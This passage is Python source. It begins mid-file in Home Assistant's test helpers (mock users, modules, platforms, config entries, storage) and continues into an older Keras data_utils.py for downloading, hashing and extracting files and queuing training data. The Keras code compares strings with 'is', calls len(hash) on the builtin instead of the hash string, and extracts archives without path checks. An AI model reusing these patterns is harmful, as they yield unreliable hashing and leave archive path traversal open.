policy=system_policies.ADMIN_POLICY): """Mock a group.""" kwargs = {"name": name, "policy": policy} if id is not None: kwargs["id"] = id super().__init__(**kwargs) def add_to_hass(self, hass): """Test helper to add entry to hass.""" return self.add_to_auth_manager(hass.auth) def add_to_auth_manager(self, auth_mgr): """Test helper to add entry to hass.""" ensure_auth_manager_loaded(auth_mgr) auth_mgr._store._groups[self.id] = self return self class MockUser(auth_models.User): """Mock a user in Home Assistant.""" def __init__( self, id=None, is_owner=False, is_active=True, name="Mock User", system_generated=False, groups=None, ): """Initialize mock user.""" kwargs = { "is_owner": is_owner, "is_active": is_active, "name": name, "system_generated": system_generated, "groups": groups or [], "perm_lookup": None, } if id is not None: kwargs["id"] = id super().__init__(**kwargs) def add_to_hass(self, hass): """Test helper to add entry to hass.""" return self.add_to_auth_manager(hass.auth) def add_to_auth_manager(self, auth_mgr): """Test helper to add entry to hass.""" ensure_auth_manager_loaded(auth_mgr) auth_mgr._store._users[self.id] = self return self def mock_policy(self, policy): """Mock a policy for a user.""" self._permissions = auth_permissions.PolicyPermissions(policy, self.perm_lookup) async def register_auth_provider(hass, config): """Register an auth provider.""" provider = await auth_providers.auth_provider_from_config( hass, hass.auth._store, config ) assert provider is not None, "Invalid config specified" key = (provider.type, provider.id) providers = hass.auth._providers if key in providers: raise ValueError("Provider already registered") providers[key] = provider return provider @ha.callback def ensure_auth_manager_loaded(auth_mgr): """Ensure an auth manager is considered loaded.""" store = auth_mgr._store if store._users is None: store._set_defaults() class MockModule: """Representation of a fake module.""" # pylint: disable=invalid-name def __init__( self, domain=None, dependencies=None, setup=None, requirements=None, config_schema=None, platform_schema=None, platform_schema_base=None, async_setup=None, async_setup_entry=None, async_unload_entry=None, async_migrate_entry=None, async_remove_entry=None, partial_manifest=None, ): """Initialize the mock module.""" self.__name__ = f"homeassistant.components.{domain}" self.__file__ = f"homeassistant/components/{domain}" self.DOMAIN = domain self.DEPENDENCIES = dependencies or [] self.REQUIREMENTS = requirements or [] # Overlay to be used when generating manifest from this module self._partial_manifest = partial_manifest if config_schema is not None: self.CONFIG_SCHEMA = config_schema if platform_schema is not None: self.PLATFORM_SCHEMA = platform_schema if platform_schema_base is not None: self.PLATFORM_SCHEMA_BASE = platform_schema_base if setup is not None: # We run this in executor, wrap it in function self.setup = lambda *args: setup(*args) if async_setup is not None: self.async_setup = async_setup if setup is None and async_setup is None: self.async_setup = AsyncMock(return_value=True) if async_setup_entry is not None: self.async_setup_entry = async_setup_entry if async_unload_entry is not None: self.async_unload_entry = async_unload_entry if async_migrate_entry is not None: self.async_migrate_entry = async_migrate_entry if async_remove_entry is not None: self.async_remove_entry = async_remove_entry def mock_manifest(self): """Generate a mock manifest to represent this module.""" return { **loader.manifest_from_legacy_module(self.DOMAIN, self), **(self._partial_manifest or {}), } class MockPlatform: """Provide a fake platform.""" __name__ = "homeassistant.components.light.bla" __file__ = "homeassistant/components/blah/light" # pylint: disable=invalid-name def __init__( self, setup_platform=None, dependencies=None, platform_schema=None, async_setup_platform=None, async_setup_entry=None, scan_interval=None, ): """Initialize the platform.""" self.DEPENDENCIES = dependencies or [] if platform_schema is not None: self.PLATFORM_SCHEMA = platform_schema if scan_interval is not None: self.SCAN_INTERVAL = scan_interval if setup_platform is not None: # We run this in executor, wrap it in function self.setup_platform = lambda *args: setup_platform(*args) if async_setup_platform is not None: self.async_setup_platform = async_setup_platform if async_setup_entry is not None: self.async_setup_entry = async_setup_entry if setup_platform is None and async_setup_platform is None: self.async_setup_platform = AsyncMock(return_value=None) class MockEntityPlatform(entity_platform.EntityPlatform): """Mock class with some mock defaults.""" def __init__( self, hass, logger=None, domain="test_domain", platform_name="test_platform", platform=None, scan_interval=timedelta(seconds=15), entity_namespace=None, ): """Initialize a mock entity platform.""" if logger is None: logger = logging.getLogger("homeassistant.helpers.entity_platform") # Otherwise the constructor will blow up. if isinstance(platform, Mock) and isinstance(platform.PARALLEL_UPDATES, Mock): platform.PARALLEL_UPDATES = 0 super().__init__( hass=hass, logger=logger, domain=domain, platform_name=platform_name, platform=platform, scan_interval=scan_interval, entity_namespace=entity_namespace, ) class MockToggleEntity(entity.ToggleEntity): """Provide a mock toggle device.""" def __init__(self, name, state, unique_id=None): """Initialize the mock entity.""" self._name = name or DEVICE_DEFAULT_NAME self._state = state self.calls = [] @property def name(self): """Return the name of the entity if any.""" self.calls.append(("name", {})) return self._name @property def state(self): """Return the state of the entity if any.""" self.calls.append(("state", {})) return self._state @property def is_on(self): """Return true if entity is on.""" self.calls.append(("is_on", {})) return self._state == STATE_ON def turn_on(self, **kwargs): """Turn the entity on.""" self.calls.append(("turn_on", kwargs)) self._state = STATE_ON def turn_off(self, **kwargs): """Turn the entity off.""" self.calls.append(("turn_off", kwargs)) self._state = STATE_OFF def last_call(self, method=None): """Return the last call.""" if not self.calls: return None if method is None: return self.calls[-1] try: return next(call for call in reversed(self.calls) if call[0] == method) except StopIteration: return None class MockConfigEntry(config_entries.ConfigEntry): """Helper for creating config entries that adds some defaults.""" def __init__( self, *, domain="test", data=None, version=1, entry_id=None, source=config_entries.SOURCE_USER, title="Mock Title", state=None, options={}, system_options={}, connection_class=config_entries.CONN_CLASS_UNKNOWN, unique_id=None, ): """Initialize a mock config entry.""" kwargs = { "entry_id": entry_id or uuid.uuid4().hex, "domain": domain, "data": data or {}, "system_options": system_options, "options": options, "version": version, "title": title, "connection_class": connection_class, "unique_id": unique_id, } if source is not None: kwargs["source"] = source if state is not None: kwargs["state"] = state super().__init__(**kwargs) def add_to_hass(self, hass): """Test helper to add entry to hass.""" hass.config_entries._entries.append(self) def add_to_manager(self, manager): """Test helper to add entry to entry manager.""" manager._entries.append(self) def patch_yaml_files(files_dict, endswith=True): """Patch load_yaml with a dictionary of yaml files.""" # match using endswith, start search with longest string matchlist = sorted(list(files_dict.keys()), key=len) if endswith else [] def mock_open_f(fname, **_): """Mock open() in the yaml module, used by load_yaml.""" # Return the mocked file on full match if fname in files_dict: _LOGGER.debug("patch_yaml_files match %s", fname) res = StringIO(files_dict[fname]) setattr(res, "name", fname) return res # Match using endswith for ends in matchlist: if fname.endswith(ends): _LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname) res = StringIO(files_dict[ends]) setattr(res, "name", fname) return res # Fallback for hass.components (i.e. services.yaml) if "homeassistant/components" in fname: _LOGGER.debug("patch_yaml_files using real file: %s", fname) return open(fname, encoding="utf-8") # Not found raise FileNotFoundError(f"File not found: {fname}") return patch.object(yaml_loader, "open", mock_open_f, create=True) def mock_coro(return_value=None, exception=None): """Return a coro that returns a value or raise an exception.""" fut = asyncio.Future() if exception is not None: fut.set_exception(exception) else: fut.set_result(return_value) return fut @contextmanager def assert_setup_component(count, domain=None): """Collect valid configuration from setup_component. - count: The amount of valid platforms that should be setup - domain: The domain to count is optional. It can be automatically determined most of the time Use as a context manager around setup.setup_component with assert_setup_component(0) as result_config: setup_component(hass, domain, start_config) # using result_config is optional """ config = {} async def mock_psc(hass, config_input, integration): """Mock the prepare_setup_component to capture config.""" domain_input = integration.domain res = await async_process_component_config(hass, config_input, integration) config[domain_input] = None if res is None else res.get(domain_input) _LOGGER.debug( "Configuration for %s, Validated: %s, Original %s", domain_input, config[domain_input], config_input.get(domain_input), ) return res assert isinstance(config, dict) with patch("homeassistant.config.async_process_component_config", mock_psc): yield config if domain is None: assert len(config) == 1, "assert_setup_component requires DOMAIN: {}".format( list(config.keys()) ) domain = list(config.keys())[0] res = config.get(domain) res_len = 0 if res is None else len(res) assert ( res_len == count ), f"setup_component failed, expected {count} got {res_len}: {res}" def init_recorder_component(hass, add_config=None): """Initialize the recorder.""" config = dict(add_config) if add_config else {} config[recorder.CONF_DB_URL] = "sqlite://" # In memory DB with patch("homeassistant.components.recorder.migration.migrate_schema"): assert setup_component(hass, recorder.DOMAIN, {recorder.DOMAIN: config}) assert recorder.DOMAIN in hass.config.components _LOGGER.info("In-memory recorder successfully started") def mock_restore_cache(hass, states): """Mock the DATA_RESTORE_CACHE.""" key = restore_state.DATA_RESTORE_STATE_TASK data = restore_state.RestoreStateData(hass) now = date_util.utcnow() last_states = {} for state in states: restored_state = state.as_dict() restored_state["attributes"] = json.loads( json.dumps(restored_state["attributes"], cls=JSONEncoder) ) last_states[state.entity_id] = restore_state.StoredState( State.from_dict(restored_state), now ) data.last_states = last_states _LOGGER.debug("Restore cache: %s", data.last_states) assert len(data.last_states) == len(states), f"Duplicate entity_id? {states}" hass.data[key] = data class MockEntity(entity.Entity): """Mock Entity class.""" def __init__(self, **values): """Initialize an entity.""" self._values = values if "entity_id" in values: self.entity_id = values["entity_id"] @property def name(self): """Return the name of the entity.""" return self._handle("name") @property def should_poll(self): """Return the ste of the polling.""" return self._handle("should_poll") @property def unique_id(self): """Return the unique ID of the entity.""" return self._handle("unique_id") @property def state(self): """Return the state of the entity.""" return self._handle("state") @property def available(self): """Return True if entity is available.""" return self._handle("available") @property def device_info(self): """Info how it links to a device.""" return self._handle("device_info") @property def device_class(self): """Info how device should be classified.""" return self._handle("device_class") @property def unit_of_measurement(self): """Info on the units the entity state is in.""" return self._handle("unit_of_measurement") @property def capability_attributes(self): """Info about capabilities.""" return self._handle("capability_attributes") @property def supported_features(self): """Info about supported features.""" return self._handle("supported_features") @property def entity_registry_enabled_default(self): """Return if the entity should be enabled when first added to the entity registry.""" return self._handle("entity_registry_enabled_default") def _handle(self, attr): """Return attribute value.""" if attr in self._values: return self._values[attr] return getattr(super(), attr) @contextmanager def mock_storage(data=None): """Mock storage. Data is a dict {'key': {'version': version, 'data': data}} Written data will be converted to JSON to ensure JSON parsing works. """ if data is None: data = {} orig_load = storage.Store._async_load async def mock_async_load(store): """Mock version of load.""" if store._data is None: # No data to load if store.key not in data: return None mock_data = data.get(store.key) if "data" not in mock_data or "version" not in mock_data: _LOGGER.error('Mock data needs "version" and "data"') raise ValueError('Mock data needs "version" and "data"') store._data = mock_data # Route through original load so that we trigger migration loaded = await orig_load(store) _LOGGER.info("Loading data for %s: %s", store.key, loaded) return loaded def mock_write_data(store, path, data_to_write): """Mock version of write data.""" _LOGGER.info("Writing data to %s: %s", store.key, data_to_write) # To ensure that the data can be serialized data[store.key] = json.loads(json.dumps(data_to_write, cls=store._encoder)) async def mock_remove(store): """Remove data.""" data.pop(store.key, None) with patch( "homeassistant.helpers.storage.Store._async_load", side_effect=mock_async_load, autospec=True, ), patch( "homeassistant.helpers.storage.Store._write_data", side_effect=mock_write_data, autospec=True, ), patch( "homeassistant.helpers.storage.Store.async_remove", side_effect=mock_remove, autospec=True, ): yield data async def flush_store(store): """Make sure all delayed writes of a store are written.""" if store._data is None: return store._async_cleanup_final_write_listener() store._async_cleanup_delay_listener() await store._async_handle_write_data() async def get_system_health_info(hass, domain): """Get system health info.""" return await hass.data["system_health"]["info"][domain](hass) def mock_integration(hass, module): """Mock an integration.""" integration = loader.Integration( hass, f"homeassistant.components.{module.DOMAIN}", None, module.mock_manifest() ) def mock_import_platform(platform_name): raise ImportError( f"Mocked unable to import platform '{platform_name}'", name=f"{integration.pkg_path}.{platform_name}", ) integration._import_platform = mock_import_platform _LOGGER.info("Adding mock integration: %s", module.DOMAIN) hass.data.setdefault(loader.DATA_INTEGRATIONS, {})[module.DOMAIN] = integration hass.data.setdefault(loader.DATA_COMPONENTS, {})[module.DOMAIN] = module return integration def mock_entity_platform(hass, platform_path, module): """Mock a entity platform. platform_path is in form light.hue. Will create platform hue.light. """ domain, platform_name = platform_path.split(".") mock_platform(hass, f"{platform_name}.{domain}", module) def mock_platform(hass, platform_path, module=None): """Mock a platform. platform_path is in form hue.config_flow. """ domain, platform_name = platform_path.split(".") integration_cache = hass.data.setdefault(loader.DATA_INTEGRATIONS, {}) module_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {}) if domain not in integration_cache: mock_integration(hass, MockModule(domain)) _LOGGER.info("Adding mock integration platform: %s", platform_path) module_cache[platform_path] = module or Mock() def async_capture_events(hass, event_name): """Create a helper that captures events.""" events = [] @ha.callback def capture_events(event): events.append(event) hass.bus.async_listen(event_name, capture_events) return events @ha.callback def async_mock_signal(hass, signal): """Catch all dispatches to a signal.""" calls = [] @ha.callback def mock_signal_handler(*args): """Mock service call.""" calls.append(args) hass.helpers.dispatcher.async_dispatcher_connect(signal, mock_signal_handler) return calls class hashdict(dict): """ hashable dict implementation, suitable for use as a key into other dicts. >>> h1 = hashdict({"apples": 1, "bananas":2}) >>> h2 = hashdict({"bananas": 3, "mangoes": 5}) >>> h1+h2 hashdict(apples=1, bananas=3, mangoes=5) >>> d1 = {} >>> d1[h1] = "salad" >>> d1[h1] 'salad' >>> d1[h2] Traceback (most recent call last): ... KeyError: hashdict(bananas=3, mangoes=5) based on answers from http://stackoverflow.com/questions/1151658/python-hashable-dicts """ def __key(self): return tuple(sorted(self.items())) def __repr__(self): # noqa: D105 no docstring return ", ".join(f"{i[0]!s}={i[1]!r}" for i in self.__key()) def __hash__(self): # noqa: D105 no docstring return hash(self.__key()) def __setitem__(self, key, value): # noqa: D105 no docstring raise TypeError(f"{self.__class__.__name__} does not support item assignment") def __delitem__(self, key): # noqa: D105 no docstring raise TypeError(f"{self.__class__.__name__} does not support item assignment") def clear(self): # noqa: D102 no docstring raise TypeError(f"{self.__class__.__name__} does not support item assignment") def pop(self, *args, **kwargs): # noqa: D102 no docstring raise TypeError(f"{self.__class__.__name__} does not support item assignment") def popitem(self, *args, **kwargs): # noqa: D102 no docstring raise TypeError(f"{self.__class__.__name__} does not support item assignment") def setdefault(self, *args, **kwargs): # noqa: D102 no docstring raise TypeError(f"{self.__class__.__name__} does not support item assignment") def update(self, *args, **kwargs): # noqa: D102 no docstring raise TypeError(f"{self.__class__.__name__} does not support item assignment") # update is not ok because it mutates the object # __add__ is ok because it creates a new object # while the new object is under construction, it's ok to mutate it def __add__(self, right): # noqa: D105 no docstring result = hashdict(self) dict.update(result, right) return result def assert_lists_same(a, b): """Compare two lists, ignoring order.""" assert collections.Counter([hashdict(i) for i in a]) == collections.Counter( [hashdict(i) for i in b] )
data_utils.py
"""Utilities for file download and caching.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import hashlib import multiprocessing as mp import os import random import shutil import sys import tarfile import threading import time import traceback import zipfile from abc import abstractmethod from contextlib import closing from multiprocessing.pool import ThreadPool import numpy as np import six from six.moves.urllib.error import HTTPError from six.moves.urllib.error import URLError from six.moves.urllib.request import urlopen try: import queue except ImportError: import Queue as queue from ..utils.generic_utils import Progbar if sys.version_info[0] == 2: def urlretrieve(url, filename, reporthook=None, data=None): """Replacement for `urlretrive` for Python 2. Under Python 2, `urlretrieve` relies on `FancyURLopener` from legacy `urllib` module, known to have issues with proxy management. # Arguments url: url to retrieve. filename: where to store the retrieved data locally. reporthook: a hook function that will be called once on establishment of the network connection and once after each block read thereafter. The hook will be passed three arguments; a count of blocks transferred so far, a block size in bytes, and the total size of the file. data: `data` argument passed to `urlopen`. """ def chunk_read(response, chunk_size=8192, reporthook=None): content_type = response.info().get('Content-Length') total_size = -1 if content_type is not None: total_size = int(content_type.strip()) count = 0 while True: chunk = response.read(chunk_size) count += 1 if reporthook is not None: reporthook(count, chunk_size, total_size) if chunk: yield chunk else: break with closing(urlopen(url, data)) as response, open(filename, 'wb') as fd: for chunk in chunk_read(response, reporthook=reporthook): fd.write(chunk) else: from six.moves.urllib.request import urlretrieve def _extract_archive(file_path, path='.', archive_format='auto'): """Extracts an archive if it matches tar, tar.gz, tar.bz, or zip formats. # Arguments file_path: path to the archive file path: path to extract the archive file archive_format: Archive format to try for extracting the file. Options are 'auto', 'tar', 'zip', and None. 'tar' includes tar, tar.gz, and tar.bz files. The default 'auto' is ['tar', 'zip']. None or an empty list will return no matches found. # Returns True if a match was found and an archive extraction was completed, False otherwise. """ if archive_format is None: return False if archive_format is 'auto': archive_format = ['tar', 'zip'] if isinstance(archive_format, six.string_types): archive_format = [archive_format] for archive_type in archive_format: if archive_type is 'tar': open_fn = tarfile.open is_match_fn = tarfile.is_tarfile if archive_type is 'zip': open_fn = zipfile.ZipFile is_match_fn = zipfile.is_zipfile if is_match_fn(file_path): with open_fn(file_path) as archive: try: archive.extractall(path) except (tarfile.TarError, RuntimeError, KeyboardInterrupt): if os.path.exists(path): if os.path.isfile(path): os.remove(path) else: shutil.rmtree(path) raise return True return False def get_file(fname, origin, untar=False, md5_hash=None, file_hash=None, cache_subdir='datasets', hash_algorithm='auto', extract=False, archive_format='auto', cache_dir=None): """Downloads a file from a URL if it not already in the cache. By default the file at the url `origin` is downloaded to the cache_dir `~/.keras`, placed in the cache_subdir `datasets`, and given the filename `fname`. The final location of a file `example.txt` would therefore be `~/.keras/datasets/example.txt`. Files in tar, tar.gz, tar.bz, and zip formats can also be extracted. Passing a hash will verify the file after download. The command line programs `shasum` and `sha256sum` can compute the hash. # Arguments fname: Name of the file. If an absolute path `/path/to/file.txt` is specified the file will be saved at that location. origin: Original URL of the file. untar: Deprecated in favor of 'extract'. boolean, whether the file should be decompressed md5_hash: Deprecated in favor of 'file_hash'. md5 hash of the file for verification file_hash: The expected hash string of the file after download. The sha256 and md5 hash algorithms are both supported. cache_subdir: Subdirectory under the Keras cache dir where the file is saved. If an absolute path `/path/to/folder` is specified the file will be saved at that location. hash_algorithm: Select the hash algorithm to verify the file. options are 'md5', 'sha256', and 'auto'. The default 'auto' detects the hash algorithm in use. extract: True tries extracting the file as an Archive, like tar or zip. archive_format: Archive format to try for extracting the file. Options are 'auto', 'tar', 'zip', and None. 'tar' includes tar, tar.gz, and tar.bz files. The default 'auto' is ['tar', 'zip']. None or an empty list will return no matches found. cache_dir: Location to store cached files, when None it defaults to the [Keras Directory](/faq/#where-is-the-keras-configuration-filed-stored). # Returns Path to the downloaded file """ # noqa if cache_dir is None: cache_dir = os.path.join(os.path.expanduser('~'), '.keras') if md5_hash is not None and file_hash is None: file_hash = md5_hash hash_algorithm = 'md5' datadir_base = os.path.expanduser(cache_dir) if not os.access(datadir_base, os.W_OK): datadir_base = os.path.join('/tmp', '.keras') datadir = os.path.join(datadir_base, cache_subdir) if not os.path.exists(datadir): os.makedirs(datadir) if untar: untar_fpath = os.path.join(datadir, fname) fpath = untar_fpath + '.tar.gz' else: fpath = os.path.join(datadir, fname) download = False if os.path.exists(fpath): # File found; verify integrity if a hash was provided. if file_hash is not None: if not validate_file(fpath, file_hash, algorithm=hash_algorithm): print('A local file was found, but it seems to be ' 'incomplete or outdated because the ' + hash_algorithm + ' file hash does not match the original value of ' + file_hash + ' so we will re-download the data.') download = True else: download = True if download: print('Downloading data from', origin) class ProgressTracker(object): # Maintain progbar for the lifetime of download. # This design was chosen for Python 2.7 compatibility. progbar = None def dl_progress(count, block_size, total_size): if ProgressTracker.progbar is None: if total_size is -1: total_size = None ProgressTracker.progbar = Progbar(total_size) else: ProgressTracker.progbar.update(count * block_size) error_msg = 'URL fetch failure on {}: {} -- {}' try: try: urlretrieve(origin, fpath, dl_progress) except HTTPError as e: raise Exception(error_msg.format(origin, e.code, e.msg)) except URLError as e: raise Exception(error_msg.format(origin, e.errno, e.reason)) except (Exception, KeyboardInterrupt): if os.path.exists(fpath): os.remove(fpath) raise ProgressTracker.progbar = None if untar: if not os.path.exists(untar_fpath): _extract_archive(fpath, datadir, archive_format='tar') return untar_fpath if extract: _extract_archive(fpath, datadir, archive_format) return fpath def _hash_file(fpath, algorithm='sha256', chunk_size=65535): """Calculates a file sha256 or md5 hash. # Example ```python >>> from keras.data_utils import _hash_file >>> _hash_file('/path/to/file.zip') 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855' ``` # Arguments fpath: path to the file being validated algorithm: hash algorithm, one of 'auto', 'sha256', or 'md5'. The default 'auto' detects the hash algorithm in use. chunk_size: Bytes to read at a time, important for large files. # Returns The file hash """ if (algorithm is 'sha256') or (algorithm is 'auto' and len(hash) is 64): hasher = hashlib.sha256() else: hasher = hashlib.md5() with open(fpath, 'rb') as fpath_file: for chunk in iter(lambda: fpath_file.read(chunk_size), b''): hasher.update(chunk) return hasher.hexdigest() def validate_file(fpath, file_hash, algorithm='auto', chunk_size=65535): """Validates a file against a sha256 or md5 hash. # Arguments fpath: path to the file being validated file_hash: The expected hash string of the file. The sha256 and md5 hash algorithms are both supported. algorithm: Hash algorithm, one of 'auto', 'sha256', or 'md5'. The default 'auto' detects the hash algorithm in use. chunk_size: Bytes to read at a time, important for large files. # Returns Whether the file is valid """ if ((algorithm is 'sha256') or (algorithm is 'auto' and len(file_hash) is 64)): hasher = 'sha256' else: hasher = 'md5' if str(_hash_file(fpath, hasher, chunk_size)) == str(file_hash): return True else: return False class Sequence(object): """Base object for fitting to a sequence of data, such as a dataset. Every `Sequence` must implement the `__getitem__` and the `__len__` methods. If you want to modify your dataset between epochs you may implement `on_epoch_end`. The method `__getitem__` should return a complete batch. # Notes `Sequence` are a safer way to do multiprocessing. This structure guarantees that the network will only train once on each sample per epoch which is not the case with generators. # Examples ```python from skimage.io import imread from skimage.transform import resize import numpy as np # Here, `x_set` is list of path to the images # and `y_set` are the associated classes. class CIFAR10Sequence(Sequence): def __init__(self, x_set, y_set, batch_size): self.x, self.y = x_set, y_set self.batch_size = batch_size def __len__(self): return int(np.ceil(len(self.x) / float(self.batch_size))) def __getitem__(self, idx): batch_x = self.x[idx * self.batch_size:(idx + 1) * self.batch_size] batch_y = self.y[idx * self.batch_size:(idx + 1) * self.batch_size] return np.array([ resize(imread(file_name), (200, 200)) for file_name in batch_x]), np.array(batch_y) ``` """ @abstractmethod def __getitem__(self, index): """Gets batch at position `index`. # Arguments index: position of the batch in the Sequence. # Returns A batch """ raise NotImplementedError @abstractmethod def __len__(self): """Number of batch in the Sequence. # Returns The number of batches in the Sequence. """ raise NotImplementedError def on_epoch_end(self): """Method called at the end of every epoch. """ pass def __iter__(self): """Create an infinite generator that iterate over the Sequence.""" while True: for item in (self[i] for i in range(len(self))): yield item # Global variables to be shared across processes _SHARED_SEQUENCES = {} # We use a Value to provide unique id to different processes. _SEQUENCE_COUNTER = None def init_pool(seqs): global _SHARED_SEQUENCES _SHARED_SEQUENCES = seqs def get_index(uid, i): """Get the value from the Sequence `uid` at index `i`. To allow multiple Sequences to be used at the same time, we use `uid` to get a specific one. A single Sequence would cause the validation to overwrite the training Sequence. # Arguments uid: int, Sequence identifier i: index # Returns The value at index `i`. """ return _SHARED_SEQUENCES[uid][i] class SequenceEnqueuer(object): """Base class to enqueue inputs. The task of an Enqueuer is to use parallelism to speed up preprocessing. This is done with processes or threads. # Examples ```python enqueuer = SequenceEnqueuer(...) enqueuer.start() datas = enqueuer.get() for data in datas: # Use the inputs; training, evaluating, predicting. # ... stop sometime. enqueuer.close() ``` The `enqueuer.get()` should be an infinite stream of datas. """ @abstractmethod def is_running(self): raise NotImplementedError @abstractmethod def start(self, workers=1, max_queue_size=10): """Starts the handler's workers. # Arguments workers: number of worker threads max_queue_size: queue size (when full, threads could block on `put()`). """ raise NotImplementedError @abstractmethod def stop(self, timeout=None): """Stop running threads and wait for them to exit, if necessary. Should be called by the same thread which called start(). # Arguments timeout: maximum time to wait on thread.join() """ raise NotImplementedError @abstractmethod def get(self): """Creates a generator to extract data from the queue. Skip the data if it is `None`. # Returns Generator yielding tuples `(inputs, targets)` or `(inputs, targets, sample_weights)`. """ raise NotImplementedError class OrderedEnqueuer(SequenceEnqueuer): """Builds a Enqueuer from a Sequence. Used in `fit_generator`, `evaluate_generator`, `predict_generator`. # Arguments sequence: A `keras.utils.data_utils.Sequence` object. use_multiprocessing: use multiprocessing if True, otherwise threading shuffle: whether to shuffle the data at the beginning of each epoch """ def __init__(self, sequence, use_multiprocessing=False, shuffle=False): self.sequence = sequence self.use_multiprocessing = use_multiprocessing global _SEQUENCE_COUNTER if _SEQUENCE_COUNTER is None: try: _SEQUENCE_COUNTER = mp.Value('i', 0) except OSError: # In this case the OS does not allow us to use # multiprocessing. We resort to an int # for enqueuer indexing. _SEQUENCE_COUNTER = 0 if isinstance(_SEQUENCE_COUNTER, int): self.uid = _SEQUENCE_COUNTER _SEQUENCE_COUNTER += 1 else: # Doing Multiprocessing.Value += x is not process-safe. with _SEQUENCE_COUNTER.get_lock(): self.uid = _SEQUENCE_COUNTER.value _SEQUENCE_COUNTER.value += 1 self.shuffle = shuffle self.workers = 0 self.executor_fn = None self.queue = None self.run_thread = None self.stop_signal = None def is_running(self): return self.stop_signal is not None and not self.stop_signal.is_set() def start(self, workers=1, max_queue_size=10): """Start the handler's workers. # Arguments workers: number of worker threads max_queue_size: queue size (when full, workers could block on `put()`) """ if self.use_multiprocessing: self.executor_fn = lambda seqs: mp.Pool(workers, initializer=init_pool, initargs=(seqs,)) else: # We do not need the init since it's threads. self.executor_fn = lambda _: ThreadPool(workers) self.workers = workers self.queue = queue.Queue(max_queue_size) self.stop_signal = threading.Event() self.run_thread = threading.Thread(target=self._run) self.run_thread.daemon = True self.run_thread.start() def _wait_queue(self): """Wait for the queue to be empty.""" while True: time.sleep(0.1) if self.queue.unfinished_tasks == 0 or self.stop_signal.is_set(): return def _run(self): """Submits request to the executor and queue the `Future` objects.""" sequence = list(range(len(self.sequence))) self._send_sequence() # Share the initial sequence while True: if self.shuffle: random.shuffle(sequence) with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor: for i in sequence: if self.stop_signal.is_set(): return self.queue.put( executor.apply_async(get_index, (self.uid, i)), block=True) # Done with the current epoch, waiting for the final batches self._wait_queue() if self.stop_signal.is_set(): # We're done return # Call the internal on epoch end. self.sequence.on_epoch_end() self._send_sequence() # Update the pool def get(self): """Creates a generator to extract data from the queue. Skip the data if it is `None`. # Yields The next element in the queue, i.e. a tuple `(inputs, targets)` or `(inputs, targets, sample_weights)`. """ try: while self.is_running(): inputs = self.queue.get(block=True).get() self.queue.task_done() if inputs is not None: yield inputs except Exception as e: self.stop() six.raise_from(StopIteration(e), e) def _send_sequence(self): """Send current Sequence to all workers.""" # For new processes that may spawn _SHARED_SEQUENCES[self.uid] = self.sequence def stop(self, timeout=None): """Stops running threads and wait for them to exit, if necessary. Should be called by the same thread which called `start()`. # Arguments timeout: maximum time to wait on `thread.join()` """ self.stop_signal.set() with self.queue.mutex: self.queue.queue.clear() self.queue.unfinished_tasks = 0 self.queue.not_full.notify() self.run_thread.join(timeout) _SHARED_SEQUENCES[self.uid] = None class GeneratorEnqueuer(SequenceEnqueuer): """Builds a queue out of a data generator. The provided generator can be finite in which case the class will throw a `StopIteration` exception. Used in `fit_generator`, `evaluate_generator`, `predict_generator`. # Arguments generator: a generator function which yields data use_multiprocessing: use multiprocessing if True, otherwise threading wait_time: time to sleep in-between calls to `put()` random_seed: Initial seed for workers, will be incremented by one for each worker. """ def __init__(self, generator, use_multiprocessing=False, wait_time=0.05, seed=None): self.wait_time = wait_time self._generator = generator if os.name is 'nt' and use_multiprocessing is True: # On Windows, avoid **SYSTEMATIC** error in `multiprocessing`: # `TypeError: can't pickle generator objects` # => Suggest multithreading instead of multiprocessing on Windows raise ValueError('Using a generator with `use_multiprocessing=True`' ' is not supported on Windows (no marshalling of' ' generators across process boundaries). Instead,' ' use single thread/process or multithreading.') else: self._use_multiprocessing = use_multiprocessing self._threads = [] self._stop_event = None self._manager = None self.queue = None self.seed = seed def _data_generator_task(self): if self._use_multiprocessing is False: while not self._stop_event.is_set(): with self.genlock: try: if (self.queue is not None and self.queue.qsize() < self.max_queue_size): # On all OSes, avoid **SYSTEMATIC** error # in multithreading mode: # `ValueError: generator already executing` # => Serialize calls to # infinite iterator/generator's next() function generator_output = next(self._generator) self.queue.put((True, generator_output)) else: time.sleep(self.wait_time) except StopIteration: break except Exception as e: # Can't pickle tracebacks. # As a compromise, print the traceback and # pickle None instead. if not hasattr(e, '__traceback__'): setattr(e, '__traceback__', sys.exc_info()[2]) self.queue.put((False, e)) self._stop_event.set() break else: while not self._stop_event.is_set(): try: if (self.queue is not None and self.queue.qsize() < self.max_queue_size): generator_output = next(self._generator) self.queue.put((True, generator_output)) else: time.sleep(self.wait_time) except StopIteration: break except Exception as e: # Can't pickle tracebacks. # As a compromise, print the traceback and pickle None instead. traceback.print_exc() setattr(e, '__traceback__', None) self.queue.put((False, e)) self._stop_event.set() break def start(self, workers=1, max_queue_size=10): """Kicks off threads which add data from the generator into the queue. # Arguments workers: number of worker threads max_queue_size: queue size (when full, threads could block on `put()`) """ try: self.max_queue_size = max_queue_size if self._use_multiprocessing: self._manager = mp.Manager() self.queue = self._manager.Queue(maxsize=max_queue_size) self._stop_event = mp.Event() else: # On all OSes, avoid **SYSTEMATIC** error in multithreading mode: # `ValueError: generator already executing` # => Serialize calls to infinite iterator/generator's next() function self.genlock = threading.Lock() self.queue = queue.Queue(maxsize=max_queue_size) self._stop_event = threading.Event() for _ in range(workers): if self._use_multiprocessing: # Reset random seed else all children processes # share the same seed np.random.seed(self.seed) thread = mp.Process(target=self._data_generator_task) thread.daemon = True if self.seed is not None: self.seed += 1 else: thread = threading.Thread(target=self._data_generator_task) self._threads.append(thread) thread.start() except: self.stop() raise def is_running(self): return self._stop_event is not None and not self._stop_event.is_set() def stop(self, timeout=None): """Stops running threads and wait for them to exit, if necessary. Should be called by the same thread which called `start()`. # Arguments timeout: maximum time to wait on `thread.join()`. """ if self.is_running(): self._stop_event.set() for thread in self._threads: if self._use_multiprocessing: if thread.is_alive(): thread.terminate() else: # The thread.is_alive() test is subject to a race condition: # the thread could terminate right after the test and before the # join, rendering this test meaningless -> Call thread.join() # always, which is ok no matter what the status of the thread. thread.join(timeout) if self._manager: self._manager.shutdown() self._threads = [] self._stop_event = None self.queue = None def get(self): """Creates a generator to extract data from the queue. Skip the data if it is `None`. # Yields The next element in the queue, i.e. a tuple `(inputs, targets)` or 